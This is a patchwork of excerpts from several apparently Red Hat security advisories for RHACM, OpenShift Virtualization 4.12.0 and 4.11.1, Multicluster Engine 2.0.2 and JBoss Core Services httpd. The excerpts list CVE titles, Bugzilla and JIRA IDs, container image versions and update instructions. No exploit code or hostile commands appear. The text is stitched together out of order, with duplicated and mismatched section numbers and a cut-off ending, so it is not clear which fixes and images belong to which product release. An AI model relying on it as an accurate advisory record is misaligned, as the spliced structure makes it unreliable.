(BZ#\n2102495)\n\n3. Bugs fixed (https://bugzilla.redhat.com/):\n\n2041540 - RHACM 2.4 using deprecated APIs in managed clusters\n2074766 - vSphere network name doesn\u0027t allow entering spaces and doesn\u0027t reflect YAML changes\n2079418 - cluster update status is stuck, also update is not even visible\n2088486 - Policy that creates cluster role is showing as not compliant due to Request entity too large message\n2089490 - Upgraded from RHACM 2.2--\u003e2.3--\u003e2.4 and cannot create cluster\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2097464 - ACM Console Becomes Unusable After a Time\n2100613 - RHACM 2.4.6 images\n2102436 - Cluster Pools with conflicting name of existing clusters in same namespace fails creation and deletes existing cluster\n2102495 - ManagedClusters in Pending import state after ACM hub migration\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2109354 - CVE-2022-31150 nodejs16: CRLF injection in node-undici\n2121396 - CVE-2022-31151 nodejs/undici: Cookie headers uncleared on cross-origin redirect\n2124794 - CVE-2022-36067 vm2:  Sandbox Escape in vm2\n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-2647 - Add link to log console from pod views\nLOG-2801 - After upgrade all logs are stored in app indices\nLOG-2917 - Changing refresh interval throws error when the \u0027Query\u0027 field is empty\n\n6. This advisory contains the following\nOpenShift Virtualization 4.12.0 images:\n\nSecurity Fix(es):\n\n* golang: net/http: limit growth of header canonicalization cache\n(CVE-2021-44716)\n\n* kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n(CVE-2022-1798)\n\n* golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n(CVE-2021-38561)\n\n* golang: syscall: don\u0027t close fd 0 on ForkExec error (CVE-2021-44717)\n\n* golang: net/http: improper sanitization of Transfer-Encoding header\n(CVE-2022-1705)\n\n* golang: go/parser: stack exhaustion in all Parse* functions\n(CVE-2022-1962)\n\n* golang: math/big: uncontrolled memory consumption due to an unhandled\noverflow via Rat.SetString (CVE-2022-23772)\n\n* golang: cmd/go: misinterpretation of branch names can lead to incorrect\naccess control (CVE-2022-23773)\n\n* golang: crypto/elliptic: IsOnCurve returns true for invalid field\nelements (CVE-2022-23806)\n\n* golang: encoding/xml: stack exhaustion in Decoder.Skip (CVE-2022-28131)\n\n* golang: syscall: faccessat checks wrong group (CVE-2022-29526)\n\n* golang: io/fs: stack exhaustion in Glob (CVE-2022-30630)\n\n* golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)\n\n* golang: path/filepath: stack exhaustion in Glob (CVE-2022-30632)\n\n* golang: encoding/xml: stack exhaustion in Unmarshal (CVE-2022-30633)\n\n* golang: encoding/gob: stack exhaustion in Decoder.Decode (CVE-2022-30635)\n\n* golang: net/http/httputil: NewSingleHostReverseProxy - omit\nX-Forwarded-For not working (CVE-2022-32148)\n\n* golang: crypto/tls: session tickets lack random ticket_age_add\n(CVE-2022-30629)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nRHEL-8-CNV-4.12\n\n=============\nbridge-marker-container-v4.12.0-24\ncluster-network-addons-operator-container-v4.12.0-24\ncnv-containernetworking-plugins-container-v4.12.0-24\ncnv-must-gather-container-v4.12.0-58\nhco-bundle-registry-container-v4.12.0-769\nhostpath-csi-driver-container-v4.12.0-30\nhostpath-provisioner-container-v4.12.0-30\nhostpath-provisioner-operator-container-v4.12.0-31\nhyperconverged-cluster-operator-container-v4.12.0-96\nhyperconverged-cluster-webhook-container-v4.12.0-96\nkubemacpool-container-v4.12.0-24\nkubevirt-console-plugin-container-v4.12.0-182\nkubevirt-ssp-operator-container-v4.12.0-64\nkubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55\nkubevirt-tekton-tasks-copy-template-container-v4.12.0-55\nkubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55\nkubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55\nkubevirt-tekton-tasks-operator-container-v4.12.0-40\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55\nkubevirt-template-validator-container-v4.12.0-32\nlibguestfs-tools-container-v4.12.0-255\novs-cni-marker-container-v4.12.0-24\novs-cni-plugin-container-v4.12.0-24\nvirt-api-container-v4.12.0-255\nvirt-artifacts-server-container-v4.12.0-255\nvirt-cdi-apiserver-container-v4.12.0-72\nvirt-cdi-cloner-container-v4.12.0-72\nvirt-cdi-controller-container-v4.12.0-72\nvirt-cdi-importer-container-v4.12.0-72\nvirt-cdi-operator-container-v4.12.0-72\nvirt-cdi-uploadproxy-container-v4.12.0-71\nvirt-cdi-uploadserver-container-v4.12.0-72\nvirt-controller-container-v4.12.0-255\nvirt-exportproxy-container-v4.12.0-255\nvirt-exportserver-container-v4.12.0-255\nvirt-handler-container-v4.12.0-255\nvirt-launcher-container-v4.12.0-255\nvirt-operator-container-v4.12.0-255\nvirtio-win-container-v4.12.0-10\nvm-network-latency-checkup-container-v4.12.0-89\n\n3. Solution:\n\nBefore applying this update, you must apply all previously released errata\nrelevant to your system. \n\nTo apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n1719190 - Unable to cancel live-migration if virt-launcher pod in pending state\n2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume\n2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache\n2030806 - CVE-2021-44717 golang: syscall: don\u0027t close fd 0 on ForkExec error\n2040377 - Unable to delete failed VMIM after VM deleted\n2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed\n2052556 - Metric \"kubevirt_num_virt_handlers_by_node_running_virt_launcher\" reporting incorrect value\n2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements\n2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString\n2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control\n2060499 - [RFE] Cannot add additional service (or other objects) to VM template\n2069098 - Large scale |VMs migration is slow due to low migration parallelism\n2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass\n2071491 - Storage Throughput metrics are incorrect in Overview\n2072797 - Metrics in Virtualization -\u003e Overview period is not clear or configurable\n2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers\n2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering\n2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group\n2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode\n2086551 - Min CPU feature found in labels\n2087724 - Default template show no boot source even there are auto-upload boot sources\n2088129 - [SSP] webhook does not comply with restricted security context\n2088464 - [CDI] cdi-deployment does not comply with restricted security context\n2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR\n2089744 - HCO should label its control plane namespace to admit pods at privileged security level\n2089751 - 4.12.0 containers\n2089804 - 4.12.0 rpms\n2091856 - ?Edit BootSource? action should have more explicit information when disabled\n2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add\n2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer\n2093771 - The disk source should be PVC if the template has no auto-update boot source\n2093996 - kubectl get vmi API should always return primary interface if exist\n2094202 - Cloud-init username field should have hint\n2096285 - KubeVirt CR API documentation is missing docs for many fields\n2096780 - [RFE] Add ssh-key and sysprep to template scripts tab\n2097436 - Online disk expansion ignores filesystem overhead change\n2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP\n2099556 - [RFE] Add option to enable RDP service for windows vm\n2099573 - [RFE] Improve template\u0027s message about not editable\n2099923 - [RFE] Merge \"SSH access\" and \"SSH command\" into one\n2100290 - Error is not dismissed on catalog review page\n2100436 - VM list filtering ignores VMs in error-states\n2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down\n2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS\n2100629 - Update nested support KBASE article\n2100679 - The number of hardware devices is not correct in vm overview tab\n2100682 - All hardware devices get deleted while just delete one\n2100684 - Workload profile are not editable during creation and after creation\n2101144 - VM filter has two \"Other\" checkboxes which are triggered together\n2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode\n2101167 - Edit buttons clickable area is too large. \n2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id\n2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state\n2101390 - Easy to miss the \"tick\" when adding GPU device to vm via UI\n2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id\n2101423 - wrong user name on using ignition\n2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page\n2101445 - \"Pending changes - Boot Order\"\n2101454 - Cannot add PVC boot source to template in \u0027Edit Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift  Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. Description:\n\nMulticluster Engine for Kubernetes 2.0.2 images\n\nMulticluster engine for Kubernetes provides the foundational components\nthat are necessary for the centralized management of multiple\nKubernetes-based clusters across data centers, public clouds, and private\nclouds. \n\nYou can use the engine to create new Red Hat OpenShift Container Platform\nclusters or to bring existing Kubernetes-based clusters under management by\nimporting them. After the clusters are managed, you can use the APIs that\nare provided by the engine to distribute configuration based on placement\npolicy. \n\nSecurity updates:\n\n* moment: inefficient parsing algorithm resulting in DoS (CVE-2022-31129)\n* vm2: Sandbox Escape in vm2 (CVE-2022-36067)\n\nBug fix:\n\n* MCE 2.0.2 images (BZ# 2104569)\n\n3. Solution:\n\nFor multicluster engine for Kubernetes, see the following documentation for\ndetails on how to install the images:\n\nhttps://access.redhat.com/documentation/en-us/red_hat_advanced_cluster_management_for_kubernetes/2.5/html-single/multicluster_engine/index#installing-while-connected-online\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2104569 - MCE 2.0.2 Images\n2105075 - CVE-2022-31129 moment: inefficient parsing algorithm resulting in DoS\n2124794 - CVE-2022-36067 vm2:  Sandbox Escape in vm2\n\n5. \n\nBug Fix(es):\n\n* Cloning a Block DV to VM with Filesystem with not big enough size comes\nto endless loop - using pvc api (BZ#2033191)\n\n* Restart of VM Pod causes SSH keys to be regenerated within VM\n(BZ#2087177)\n\n* Import gzipped raw file causes image to be downloaded and uncompressed to\nTMPDIR (BZ#2089391)\n\n* [4.11] VM Snapshot Restore hangs indefinitely when backed by a\nsnapshotclass (BZ#2098225)\n\n* Fedora version in DataImportCrons is not \u0027latest\u0027 (BZ#2102694)\n\n* [4.11] Cloned VM\u0027s snapshot restore fails if the source VM disk is\ndeleted (BZ#2109407)\n\n* CNV introduces a compliance check fail in \"ocp4-moderate\" profile -\nroutes-protected-by-tls (BZ#2110562)\n\n* Nightly build: v4.11.0-578: index format was changed in 4.11 to\nfile-based instead of sqlite-based (BZ#2112643)\n\n* Unable to start windows VMs on PSI setups (BZ#2115371)\n\n* [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity\nrestricted:v1.24 (BZ#2128997)\n\n* Mark Windows 11 as TechPreview (BZ#2129013)\n\n* 4.11.1 rpms (BZ#2139453)\n\nThis advisory contains the following OpenShift Virtualization 4.11.1\nimages. \n\nRHEL-8-CNV-4.11\n\nvirt-cdi-operator-container-v4.11.1-5\nvirt-cdi-uploadserver-container-v4.11.1-5\nvirt-cdi-apiserver-container-v4.11.1-5\nvirt-cdi-importer-container-v4.11.1-5\nvirt-cdi-controller-container-v4.11.1-5\nvirt-cdi-cloner-container-v4.11.1-5\nvirt-cdi-uploadproxy-container-v4.11.1-5\ncheckup-framework-container-v4.11.1-3\nkubevirt-tekton-tasks-wait-for-vmi-status-container-v4.11.1-7\nkubevirt-tekton-tasks-create-datavolume-container-v4.11.1-7\nkubevirt-template-validator-container-v4.11.1-4\nvirt-handler-container-v4.11.1-5\nhostpath-provisioner-operator-container-v4.11.1-4\nvirt-api-container-v4.11.1-5\nvm-network-latency-checkup-container-v4.11.1-3\ncluster-network-addons-operator-container-v4.11.1-5\nvirtio-win-container-v4.11.1-4\nvirt-launcher-container-v4.11.1-5\novs-cni-marker-container-v4.11.1-5\nhyperconverged-cluster-webhook-container-v4.11.1-7\nvirt-controller-container-v4.11.1-5\nvirt-artifacts-server-container-v4.11.1-5\nkubevirt-tekton-tasks-modify-vm-template-container-v4.11.1-7\nkubevirt-tekton-tasks-disk-virt-customize-container-v4.11.1-7\nlibguestfs-tools-container-v4.11.1-5\nhostpath-provisioner-container-v4.11.1-4\nkubevirt-tekton-tasks-disk-virt-sysprep-container-v4.11.1-7\nkubevirt-tekton-tasks-copy-template-container-v4.11.1-7\ncnv-containernetworking-plugins-container-v4.11.1-5\nbridge-marker-container-v4.11.1-5\nvirt-operator-container-v4.11.1-5\nhostpath-csi-driver-container-v4.11.1-4\nkubevirt-tekton-tasks-create-vm-from-template-container-v4.11.1-7\nkubemacpool-container-v4.11.1-5\nhyperconverged-cluster-operator-container-v4.11.1-7\nkubevirt-ssp-operator-container-v4.11.1-4\novs-cni-plugin-container-v4.11.1-5\nkubevirt-tekton-tasks-cleanup-vm-container-v4.11.1-7\nkubevirt-tekton-tasks-operator-container-v4.11.1-2\ncnv-must-gather-container-v4.11.1-8\nkubevirt-console-plugin-container-v4.11.1-9\nhco-bundle-registry-container-v4.11.1-49\n\n3. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n====================================================================                   \nRed Hat Security Advisory\n\nSynopsis:          Moderate: Red Hat JBoss Core Services Apache HTTP Server 2.4.51 SP1 security update\nAdvisory ID:       RHSA-2022:8840-01\nProduct:           Red Hat JBoss Core Services\nAdvisory URL:      https://access.redhat.com/errata/RHSA-2022:8840\nIssue date:        2022-12-08\nCVE Names:         CVE-2022-1292 CVE-2022-2068 CVE-2022-22721\n                   CVE-2022-23943 CVE-2022-26377 CVE-2022-28330\n                   CVE-2022-28614 CVE-2022-28615 CVE-2022-30522\n                   CVE-2022-31813 CVE-2022-32206 CVE-2022-32207\n                   CVE-2022-32208 CVE-2022-32221 CVE-2022-35252\n                   CVE-2022-42915 CVE-2022-42916\n====================================================================\n1. Summary:\n\nAn update is now available for Red Hat JBoss Core Services. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat JBoss Core Services on RHEL 7 Server - noarch, x86_64\nRed Hat JBoss Core Services on RHEL 8 - noarch, x86_64\n\n3. Description:\n\nRed Hat JBoss Core Services is a set of supplementary software for Red Hat\nJBoss middleware products. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nThis release of Red Hat JBoss Core Services Apache HTTP Server 2.4.51\nService Pack 1 serves as a replacement for Red Hat JBoss Core Services\nApache HTTP Server 2.4.51, and includes bug fixes and enhancements, which\nare documented in the Release Notes document linked to in the References. \n\nSecurity Fix(es):\n\n* curl: HSTS bypass via IDN (CVE-2022-42916)\n\n* curl: HTTP proxy double-free (CVE-2022-42915)\n\n* curl: POST following PUT confusion (CVE-2022-32221)\n\n* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n(CVE-2022-31813)\n\n* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)\n\n* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)\n\n* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)\n\n* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)\n\n* curl: control code in cookie denial of service (CVE-2022-35252)\n\n* jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)\n\n* curl: Unpreserved file permissions (CVE-2022-32207)\n\n* curl: various flaws (CVE-2022-32206 CVE-2022-32208)\n\n* openssl: the c_rehash script allows command injection (CVE-2022-2068)\n\n* openssl: c_rehash script allows command injection (CVE-2022-1292)\n\n* jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large\nor unlimited LimitXMLRequestBody (CVE-2022-22721)\n\n* jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds\n(CVE-2022-23943)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\nApplications using the APR libraries, such as httpd, must be restarted for\nthis update to take effect. After installing the updated packages, the\nhttpd daemon will be restarted automatically. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds\n2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody\n2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection\n2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling\n2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read\n2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()\n2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()\n2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability\n2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099305 - CVE-2022-32207 curl: Unpreserved file permissions\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n2120718 - CVE-2022-35252 curl: control code in cookie denial of service\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2135413 - CVE-2022-42915 curl: HTTP proxy double-free\n2135416 - CVE-2022-42916 curl: HSTS bypass via IDN\n\n6. Package List:\n\nRed Hat JBoss Core Services on 